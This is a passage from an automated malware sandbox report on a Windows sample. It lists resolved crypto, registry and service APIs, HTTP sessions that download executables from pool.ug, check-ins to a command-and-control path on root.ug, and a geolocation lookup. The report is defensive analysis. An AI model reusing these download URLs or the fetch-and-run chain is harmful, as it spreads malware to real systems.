Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x76cd739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74b59263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a8436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathA, address_out = 0x760e7804 True 1
Fn
Service (2)
»
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
System (107)
»
Operation Additional Information Success Count Logfile
Sleep duration = 100 milliseconds (0.100 seconds) True 101
Fn
Get Time type = System Time, time = 2019-05-13 17:22:52 (UTC) True 1
Fn
Get Time type = Ticks, time = 152132 True 1
Fn
Get Time type = Performance Ctr, time = 21302211652 True 1
Fn
Get Time type = System Time, time = 2019-05-13 17:22:54 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 21545969016 True 1
Fn
Get Time type = System Time, time = 2019-05-13 17:22:56 (UTC) True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (10)
»
Information Value
Total Data Sent 5.49 KB
Total Data Received 5.98 MB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 46.232.113.12
HTTP Session #1
»
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin1.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin1.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 2560 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin2.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin2.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 4608 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 7680 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #4
»
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/3.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/3.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #5
»
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/4.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/4.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #6
»
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/5.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/5.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 19
Fn
Data
Read Response size = 10240, size_out = 2048 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #7
»
Information Value
User Agent Microsoft Internet Explorer
Server Name root.ug
Server Port 80
Username -
Password -
Data Sent 537 bytes
Data Received 1.24 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = root.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php?pid=32EB8DA0DCF8DD23092C768E66F3E191&first=true True 1
Fn
Read Response size = 1024, size_out = 255 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #8
»
Information Value
User Agent Microsoft Internet Explorer
Server Name root.ug
Server Port 80
Username -
Password -
Data Sent 537 bytes
Data Received 1.24 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = root.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php?pid=32EB8DA0DCF8DD23092C768E66F3E191&first=true True 1
Fn
Read Response size = 1024, size_out = 255 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #9
»
Information Value
User Agent Microsoft Internet Explorer
Server Name root.ug
Server Port 80
Username -
Password -
Data Sent 537 bytes
Data Received 1.24 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = root.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php?pid=32EB8DA0DCF8DD23092C768E66F3E191&first=true True 1
Fn
Read Response size = 1024, size_out = 255 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #10
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.19 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
Process #6: updatewin1.exe
671 0
»
Information Value
ID #6
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:38, Reason: Child Process
Unmonitor End Time: 00:01:41, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0x8f0
Parent PID 0x2c8 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 354
0x 128
0x 5E4
0x 41C
0x 7A8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin1.exe 0x00400000 0x0044CFFF Relevant Image - 32-bit - False False
...
buffer 0x00505000 0x00505FFF Marked Executable - 32-bit - False False
...
updatewin1.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000004f0000:+0x16795 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000910000:+0x65f6f6
...
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe show_window = SW_SHOW True 1
Fn
Module (154)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
